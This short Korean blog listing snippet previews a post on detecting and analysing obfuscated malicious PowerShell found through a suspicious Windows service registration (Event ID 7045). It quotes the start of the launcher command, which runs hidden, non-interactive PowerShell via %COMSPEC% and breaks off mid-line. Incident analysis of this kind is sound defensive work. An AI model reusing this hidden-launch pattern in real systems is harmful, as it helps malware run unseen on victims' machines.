반응형 난독화 악성 파워쉘 코드 탐지 및 분석 자료1 난독화 악성 파워쉘 코드 탐지 및 분석 자료 악성 코드 탐지윈도우 이벤트에서 수상한 서비스 등록을 확인 및 난독화 코드 발견윈도우 이벤트 뷰어 - 시스템 - Event ID 7045(서비스 등록)**7045**04000x8080000000000000xxxxxxSystemPC123- xxrandomSevicenamexxx%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b=$env:windir+'\\sysnative\\WindowsPowerShell\\v1.0\\powershell.exe'}else{$b='powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s... 2024. 9. 23. 이전 1 다음 반응형
